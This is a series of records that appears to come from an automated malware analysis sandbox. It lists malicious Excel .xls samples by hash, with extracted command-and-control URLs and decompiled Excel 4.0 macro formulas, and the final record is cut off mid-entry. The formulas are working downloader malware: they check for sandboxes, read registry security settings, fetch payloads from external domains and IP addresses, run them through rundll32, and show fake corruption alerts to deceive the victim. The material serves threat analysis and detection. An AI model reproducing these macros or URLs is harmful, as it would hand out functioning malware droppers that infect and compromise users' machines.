{"version":"0.2","sample":{"sample":"","kind":"file","target":"5651f1e1acfb28416fb54aa3c858df3943a378e2f2130d48350b55aeffbe2915"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"5651f1e1acfb28416fb54aa3c858df3943a378e2f2130d48350b55aeffbe2915","filesize":185344,"md5":"edaf13d4ba6e1f1ddb4cbc90c558162e","sha1":"0a68cb9396961166478c9cadec63dce0d8faa049","sha256":"5651f1e1acfb28416fb54aa3c858df3943a378e2f2130d48350b55aeffbe2915","sha512":"2dfcedbd0f980b0d5ae0ef1edfd55f5343a2993636b0aaf1c2ac423fa69144d5e6a556be7e552863d58fbf0907a249eb9f19d7aa240eed45f41576067b763b97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5651f1e1acfb28416fb54aa3c858df3943a378e2f2130d48350b55aeffbe2915.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"565565a24cb0ff8247e1da3ba7f1b670fa6b8ace4dd94d66c9def933b17877ec"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"565565a24cb0ff8247e1da3ba7f1b670fa6b8ace4dd94d66c9def933b17877ec","filesize":167936,"md5":"26312b25ace6503c0876700df13686e9","sha1":"2f20c13aa468e68c80cadcc3d5abd11d18a6d55e","sha256":"565565a24cb0ff8247e1da3ba7f1b670fa6b8ace4dd94d66c9def933b17877ec","sha512":"f3cc8e172fe1be05b986990e0d447999f8a23679c61f865e5893be4fc2400619358eeb5fcf4587419623fe512959ffe35500d6c53647d61d62b93cb4665ea5c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"565565a24cb0ff8247e1da3ba7f1b670fa6b8ace4dd94d66c9def933b17877ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R1jVE5YEgn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"566575a767dac9a2c5bba78ba8be000ab82b4ec2a10f4a93efd76dd12604c55b"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"566575a767dac9a2c5bba78ba8be000ab82b4ec2a10f4a93efd76dd12604c55b","filesize":209920,"md5":"6f83510e94b4fd7e26fa08da480462d1","sha1":"2d97ee3f56f4fb8aa671f01dea4f0f2b09f879f9","sha256":"566575a767dac9a2c5bba78ba8be000ab82b4ec2a10f4a93efd76dd12604c55b","sha512":"41e88982b4c2486369f0ac567d40502e69b9ee23b95657e2119f49b6044b1259b776224333f845056da692486a33bde80ee9da0b47a36dd2510fd90f37b9e605","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"566575a767dac9a2c5bba78ba8be000ab82b4ec2a10f4a93efd76dd12604c55b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"asmqDzkYzt\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5695410050a5ac1ae84e5862a7ef8229994cad13406486cbac4270e312e55190"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"5695410050a5ac1ae84e5862a7ef8229994cad13406486cbac4270e312e55190","filesize":225280,"md5":"cf6d398e459b287dbf60a124e892195e","sha1":"9c3e47d399476fdaa952096dc689fa4dea964dee","sha256":"5695410050a5ac1ae84e5862a7ef8229994cad13406486cbac4270e312e55190","sha512":"772aadd20086c238242768ed3acf55615b1851ff22a7223fa476389971f1c3f512e5fa645d3eaa3cf4af8e81bc432c20c34d1aa3049ffad241aa2f2cb95146be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5695410050a5ac1ae84e5862a7ef8229994cad13406486cbac4270e312e55190.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wq4qQo4j2E\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56a22dea5d99fc84d6f9e298d4215a21c8aecf6d248fb49dfa3dfc571440c194"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56a22dea5d99fc84d6f9e298d4215a21c8aecf6d248fb49dfa3dfc571440c194","filesize":214528,"md5":"ca760b3976cd39bf2a5ec0bbc55c6afd","sha1":"093987a29373e95a8b219ba3ae0dfa7c41beaa40","sha256":"56a22dea5d99fc84d6f9e298d4215a21c8aecf6d248fb49dfa3dfc571440c194","sha512":"c80d39107940a225f18678df5489e4156098b6f4b7d224f526c42a6bd27eb98de0b33a07c8ba7bb2762ba6583cdd17e7c2e649c7e7dd09400ba10af35391b92a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56a22dea5d99fc84d6f9e298d4215a21c8aecf6d248fb49dfa3dfc571440c194.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4T7DsOgIfm\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56a2c1ca8c44f0d637c55d44ae37fd5d9b43c91324eef42f66ab473ea3250b0f"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56a2c1ca8c44f0d637c55d44ae37fd5d9b43c91324eef42f66ab473ea3250b0f","filesize":167936,"md5":"fd6da0207335a7413606539df4f846ad","sha1":"9fd5fa5320fba9f152a8065351e05bee10681c4a","sha256":"56a2c1ca8c44f0d637c55d44ae37fd5d9b43c91324eef42f66ab473ea3250b0f","sha512":"43005ef78137631518e088524f60fb5a0db6e551927ec0004d884165a5425cd6dfda812942e950553efc85642f06639fbdcea7f484a72905bc027ef1b6f6c046","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56a2c1ca8c44f0d637c55d44ae37fd5d9b43c91324eef42f66ab473ea3250b0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jp8v7Agwnj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56a882881128027d828f56c661657a775449e648e7645875c7f1cff0cac70870"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56a882881128027d828f56c661657a775449e648e7645875c7f1cff0cac70870","filesize":152576,"md5":"15bc08f628ba6bb847a396717e13e17a","sha1":"75a6b022581ec36ab9d2f4ddda24ba0663275c90","sha256":"56a882881128027d828f56c661657a775449e648e7645875c7f1cff0cac70870","sha512":"8438abc629981888ed6bfecb3a4a64afc3d87c6a87a821acc360a3561f7b9a3d3f05f17537eed6da3c6dd8186e22668f5cf3e61e1abdacdd5b0ab203bd9c29af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56a882881128027d828f56c661657a775449e648e7645875c7f1cff0cac70870.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"amBshFb3u9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56c50724cec37e4a2da5c5c9410f43fba88448fedb3d71b236d53859a4889251"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56c50724cec37e4a2da5c5c9410f43fba88448fedb3d71b236d53859a4889251","filesize":185344,"md5":"b1248c29543325b40e20df8df789099c","sha1":"1bf18089b0df9dd4064f65eb98c2a7279251fadb","sha256":"56c50724cec37e4a2da5c5c9410f43fba88448fedb3d71b236d53859a4889251","sha512":"c223b49efdc202d996e974f0a6c9850d558aae0d73ff32e1b3427e4e7a055a6aca8c4a3370b3ae6153f70ef0fb717a91bb29e6c6c985af7c53c71c8cfa9ab0a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56c50724cec37e4a2da5c5c9410f43fba88448fedb3d71b236d53859a4889251.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56cd4ba66ab95e7aca7a5c5cb08ee687e6932e3e74213270126d45dfcd251e71"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56cd4ba66ab95e7aca7a5c5cb08ee687e6932e3e74213270126d45dfcd251e71","filesize":141824,"md5":"5c8a58115ef0055f5f0c5b5573772d4c","sha1":"7d4b60a2b49be36a3023a52fec5e3de9dc906924","sha256":"56cd4ba66ab95e7aca7a5c5cb08ee687e6932e3e74213270126d45dfcd251e71","sha512":"5a80ad3061c7a5919dad5cf05e06bc37fdade557de9ee06750b20fdcfdec2145264bda764106a5aff17e88403fabc456931f6b8440c06b2cb478c9c8868a484a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56cd4ba66ab95e7aca7a5c5cb08ee687e6932e3e74213270126d45dfcd251e71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"Q4s4P9qCQQ\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56f2ef38d756b67669c5eacd29cd9c2ffc72a10b4cf539a108ac52ba4b4e01ff"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56f2ef38d756b67669c5eacd29cd9c2ffc72a10b4cf539a108ac52ba4b4e01ff","filesize":160768,"md5":"b7246acd84e5eaaa9de76b2adf53bc88","sha1":"641e1db421fd459bf49dc358d365204a080fc4a7","sha256":"56f2ef38d756b67669c5eacd29cd9c2ffc72a10b4cf539a108ac52ba4b4e01ff","sha512":"7132fd3540e6f4a058cda66475aac2be2349f82f2d44b3d0ca1b725c1bc42cde4d4f942d3aa58e274dcb246fac4bf3d9bad03e9ffd777b6ec3449358d4588284","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56f2ef38d756b67669c5eacd29cd9c2ffc72a10b4cf539a108ac52ba4b4e01ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tEKMpzrjVp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"56f40c8625f5c09ea360cd8aec8d6fe060eea675cc37d41de34ee2961931440a"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"56f40c8625f5c09ea360cd8aec8d6fe060eea675cc37d41de34ee2961931440a","filesize":103941,"md5":"7fd0599941653c25e463dc508439eafa","sha1":"076c3e72ebf8373c48ef4f20ec14e43a9aa852b5","sha256":"56f40c8625f5c09ea360cd8aec8d6fe060eea675cc37d41de34ee2961931440a","sha512":"dcab71001efe2aa9b769c5fc1645625ac2811e1722dfc382c9c2ccecc548e6bf4088db1017cacf7773ee32ac0fd7387d5ae752511dbab19d686a8e6c91f30ffb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"56f40c8625f5c09ea360cd8aec8d6fe060eea675cc37d41de34ee2961931440a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"571a3adfe093b1f09806eeaac287dd6cb670661a920dec1f4d7336e20b54185d"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"571a3adfe093b1f09806eeaac287dd6cb670661a920dec1f4d7336e20b54185d","filesize":221184,"md5":"fd6a0f28516919ba7f820b0a6e1c13d3","sha1":"20b67588f2a24e2ef3b6f54ed8881a4a4bd3c603","sha256":"571a3adfe093b1f09806eeaac287dd6cb670661a920dec1f4d7336e20b54185d","sha512":"56eb3cfa7205899bba3354d5c4729a068b3e856e636d921d6803b3fe4b29d6430226aef77ad544da7cdcbfb6a83ba60ccaf1ee999e864750cded76b2804e0e02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"571a3adfe093b1f09806eeaac287dd6cb670661a920dec1f4d7336e20b54185d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FeLNyOck0p\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57213d02694eddbcb80b5c206cf2d7554032b4b09deb88c5c860f65232c79d94"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57213d02694eddbcb80b5c206cf2d7554032b4b09deb88c5c860f65232c79d94","filesize":185344,"md5":"c55d69a9e2a663f71ee5fc2f86662592","sha1":"a07f2a710e6d8960215e51795c3a84324c5b5541","sha256":"57213d02694eddbcb80b5c206cf2d7554032b4b09deb88c5c860f65232c79d94","sha512":"46b7f2902a6c505a9b973adb494866569e2b8334b8bd722b28077f8d2438a431329aed3d3d6b13f67210bb6100f2c71375f17deea0e8f5c1face03ac4d31e57c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57213d02694eddbcb80b5c206cf2d7554032b4b09deb88c5c860f65232c79d94.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57265e59af66a799f9a48ed59cbc77be901b446c3d2268484015becb598b28f6"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57265e59af66a799f9a48ed59cbc77be901b446c3d2268484015becb598b28f6","filesize":206336,"md5":"c4fa3875c11c870071fdbc1522663a6d","sha1":"1621977c054b1c8db51fef38de076ce831ec0c96","sha256":"57265e59af66a799f9a48ed59cbc77be901b446c3d2268484015becb598b28f6","sha512":"8d64b5847e90e797aa059be76a97cfc9c0dfd036628489748f64e35174b9055926800d36a21056520809b509e69af35862376f77c89576de29e6478bb82aff4b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57265e59af66a799f9a48ed59cbc77be901b446c3d2268484015becb598b28f6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"D7WyzRf5dm\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"572ba2a77f3c469dd4e7d7a7423792a44f72501820069066aeb318b64e8ef9e3"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"572ba2a77f3c469dd4e7d7a7423792a44f72501820069066aeb318b64e8ef9e3","filesize":103941,"md5":"1adfb9e9b93a150ea7941cfee16defd7","sha1":"0a544a34fa43c85e01ae4c9c5f0b090ec37c170c","sha256":"572ba2a77f3c469dd4e7d7a7423792a44f72501820069066aeb318b64e8ef9e3","sha512":"e97ecb91d0ac325e1b6646ae10d3c9a7b6862772c7e7d23bb531322c9e37d76e99b22ec13e6927e48bfe81bdb3144fd806bac3e23d38e6dfb58d4177ec906f1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"572ba2a77f3c469dd4e7d7a7423792a44f72501820069066aeb318b64e8ef9e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 